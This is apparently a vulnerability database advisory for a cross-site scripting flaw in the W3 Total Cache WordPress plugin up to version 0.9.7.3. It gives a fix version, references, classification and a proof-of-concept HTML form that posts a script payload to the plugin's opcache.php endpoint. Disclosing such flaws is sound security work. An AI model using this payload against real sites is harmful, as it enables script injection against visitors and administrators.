W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)



Proof of Concept
<!DOCTYPE html>
<html>
<body>
     <form action="http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php" method="POST">
         <input type="text" name="nonce" value="974ca6ad15021a6668e7ae02e1be551c">
         <input type="text" name="command" value="<script>alert(1)</script>">
         <input type="submit" name="">
     </form>
</body>
</html> 

Affects Plugin

fixed in version 0.9.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 5600
Verified Yes
WPVDB ID 9269

Timeline

Publicly Published 2019-05-06 (2 months ago)
Added 2019-05-06 (2 months ago)
Last Updated 2019-05-07 (2 months ago)